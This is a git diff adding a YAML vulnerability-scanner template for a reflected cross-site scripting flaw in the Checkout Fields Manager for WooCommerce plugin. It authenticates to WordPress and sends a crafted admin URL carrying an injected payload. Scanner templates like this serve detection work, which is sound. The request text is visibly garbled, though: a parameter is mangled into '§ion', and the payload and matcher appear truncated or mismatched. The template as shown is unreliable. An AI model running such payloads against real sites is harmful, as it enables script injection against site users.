diff --git a/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml b/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml
new file mode 100644
index 0000000000..45b8bc25e0
--- /dev/null
+++ b/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml
@@ -0,0 +1,44 @@
+id: checkout-fields-manager-xss
+
+info:
+ name: Checkout Fields Manager for WooCommerce < 5.5.7 - Reflected Cross-Site Scripting
+ author: Akincibor
+ severity: medium
+ description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
+ reference:
+ - https://wpscan.com/vulnerability/ea617acd-348a-4060-a8bf-08ab3b569577
+ - https://wordpress.org/plugins/woocommerce-checkout-manager
+ metadata:
+ verified: true
+ tags: wp-plugin,xss,wp,wordpress,authenticated,woocommerce
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+ - |
+ GET /wp-admin/admin.php?page=wc-settings&tab=wooccm§ion=advanced&">--> HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '>-->&action=wooccm_nuke_options&'
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200